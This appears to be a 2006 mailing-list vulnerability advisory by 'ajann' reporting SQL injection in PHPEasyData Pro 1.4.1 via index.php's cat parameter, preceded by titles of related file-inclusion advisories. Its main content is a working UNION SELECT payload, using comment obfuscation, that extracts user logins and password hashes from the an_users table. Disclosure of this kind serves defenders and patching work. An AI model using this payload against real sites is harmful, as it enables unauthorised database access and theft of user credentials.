Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

GEPI <= 1.4.0 gestion/savebackup. php Remote File Include Vulnerability

[ECHO_ADV_56$2006] P-Book <= 1.17 (pb_lang) Remote File Inclusion

HITWEB Remote File Include

Clanlite Remote File Include

From:	ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:	31.10.2006
Subject:	PHPEasyData Pro 1.4.1 (index.php) Remote SQL Injection Vulnerability

Vulnerability Report
*******************************************************************************
# Title  :  PHPEasyData Pro 1.4.1 (index.php) Remote SQL Injection Vulnerability
# Author :   ajann

*******************************************************************************

###http://[target]/[path]/index.php?cat=[  SQL ]

Example:

//index.php?cat=-1/**/union/**/select/**/0,concat(user_login,
char(32),user_pass),0,
0/**/from/**/an_users/**/where/**/user_id%20like%205/*


""""""""""""""
"""""""
# ajann,Turkey
# ...

# Im not Hacker!